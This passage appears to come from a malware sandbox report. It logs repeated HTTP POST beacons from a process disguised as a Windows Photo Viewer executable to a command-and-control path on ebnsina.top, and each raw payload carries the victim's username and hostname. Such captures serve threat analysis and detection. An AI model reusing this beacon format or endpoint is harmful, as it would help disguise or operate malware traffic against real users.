Apr 3, 2024 06:38:19.372255087 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:19.497173071 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:19.941133022 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KrlVOwCxvBupuydfn75eAchUQOX91pTwKoMTDEKBeK7Zi5syzorGMybricdLRgooaszbVvgXtx87begneOBUaasXldsGHraNGJh1T1O%2F6ACCMifBJeMMcrqOFgk04A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e537e997416-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49809	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:20.198908091 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:20.323904991 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:20.621764898 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BR6ciu1nNd1aoXAUuxNwXh0oThf6BxGgBSGTwpVcifkRAp5MDssMNIMpK8pvxcMvTbCzi5EYj4P%2FaemqVSP7OXTCHGx4NP5Xhfgd6q%2Bb%2Bh5VqJoO1z2LW1nI1EkXjQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e58adb56dcb-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49810	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:20.890742064 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:21.015816927 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:21.458014965 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=esPKSNOnrQw1hQ3%2Fs3iY0RcU%2FcnumsbUfYDzfiRs1xibzll1hbhD3BHhUj3C9f65pwD7VynwC%2FvpmVBHgQZQlYdRUiNTcG2%2FmfBeoe7yBQssEncmD7mGv0xGCB90pA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e5cfcb5334f-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49811	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:21.763703108 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:21.889727116 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:22.333748102 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=URYDICmN3OiBA%2BdKsfHzOkfWvc7IZC%2F4VO8iGShAbgZNcEkoE34esyUC3zuS2xu6nGbnRD5qTAEFgrFSSW78Qmt6r%2Fxnt7fAJfJgDtWOBtxZFkuEV1J5DKblg6P77Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e626fa0b3c5-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49812	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:23.522238970 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:23.647484064 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:23.938572884 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hrCvBMnSsB%2BdzvMdlyOCVTMiRfkfDe8WktGtFXNXLfMmW5jwwgbLDXqSEHA2SExOhiUPVHvSExZCtV2fx6Lz81KaB3kJYSY93qzTXSB5xDKAGc%2BpUjWnqU0K1JHMIQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e6d6dd32227-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49813	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:24.205255985 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:24.329957962 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:24.761571884 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JmWjgbg0t%2F0DPmFUj9TZ98OkL5Rv6c%2BTzO21HWAS7toii2gRdu%2B4SgQilkQ4Yn3mZD32yiadpTSIC5Vl7uDeXZ8jXBqsdBq9Vtp9t9AASbwdxokI4yrk7u0uJO%2FHww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e71ae8eda43-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49814	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:25.036535025 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:25.164449930 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:25.455316067 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AEGlj%2BZWpJ%2B97T3MndUUFoGE0v6WnNAH1IguW4yQDd6Ow0ICaXY7ZaUNBkltNF0OTcXvaMBvE79FXATJmwNFsGegRd9JN5Go2BVzC25wY36PVVendvJkbmYEHKMcJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e76d97e8de2-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49815	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:25.719182014 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:25.843756914 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:26.271128893 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o689%2FqVZ3ps4s3jYIJByzIEyRNLEga2fv%2BP3SQtXp9J6IPVJ7S%2FcVIdnsKvreq3NbuStu5RkNdJVY219JJ6xcxe491NzIKSYQs0ORwh4KHm50oLna8fRmpi418sftA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e7b2b3267c9-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49816	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:26.534492016 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:26.659351110 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:26.953021049 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZzoJNsihDtjhArl%2BbrUYr%2FqQQln3xU5A0aDCtNhEWVlsZ0dcwJb0DQ4Lv%2BcOvQ7i1hLtovIe1EmIsNPKjTKRe9Y9nlSlVmWQPtfuJkf%2BYiBS7987vlSF0C%2BwEQ20lg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e803b1ab3d7-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49817	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:27.224946976 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:27.349596024 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:27.639605999 CEST	629	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yPZnX9dMuQLX1s1P1OYF1wBaUw%2FmugDAKXCns7YlWidItFakGEIyHY3%2FyJqZGK84bxp8DHR%2FNwjS%2F%2FJUbdZ18Z1rq5OXsgHzPeaxRiSALv208ut9B%2FuX8dV9qWi0Jg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e848f760325-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49818	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:27.904800892 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:28.029470921 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:28.327128887 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qIuupXinvVPhzKJze6BElipEHM90W4C3hNPRJptLexQstkhozdg5dJoDPjzuhQgPOSKYSLsge2N%2FR64Pn%2FKdBcxmkZeKjgDKhzV7QY0Od0yaSFKkvtqs3TmEJdKNkQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e88c8959acc-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49819	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:28.593678951 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:28.718050003 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:29.010371923 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xiUjJfejnrhQVYkIo64iXSegLlIfHHmndKafJ83GT44pj2x2tTrxMkihkA0w6D98Ltr67snBuXAI%2BcjVfrarmvw5sXPYio96DImNsO4YCjBSqua5cBmjRy5Cq1kcmw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e8d1a87dab5-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49820	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:29.278542995 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:29.403072119 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:29.710725069 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IF93j4cSdzLGGoSbo5J4FMPMSEP2Uh%2FjYmd2wRLUZxIY0SbHAhSaYjytZKa7hWgZqIlgmjyGj0ICTW4tD4QEVKXnwJWeGcJGYfO5G7RJCCBh64JE6bQQeJv3PhcU8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e916f2d67d4-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49821	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:29.987306118 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:30.112055063 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:30.401864052 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkl5dupeCy9CYoi4zRxGe7OyVw%2BLK6U9ootOww4sbYws2XaQ8yodC6AuD%2FG6dNEJ%2BJ1viyLz8kE3De2eqcAX9oA%2BKVPbwXJP3j%2F4rhA4hdLG6nQiSoxT6i8S4lifAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e95cecab3c8-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49822	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:30.670975924 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:30.797080040 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:31.090198040 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JBwqmNRtIMwITTAQ5Rcw31XzKVmoW0mGcqHKrMjIyqbZkdPfo9BcmK35OwKlcJDK9IfQeFNl3yYIH8nStM%2BfkFZUb9YPnLDwK%2BYLzzyuZaJ1AoWujWQ3shmE5mtjxg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65e9a1c099071-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49823	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
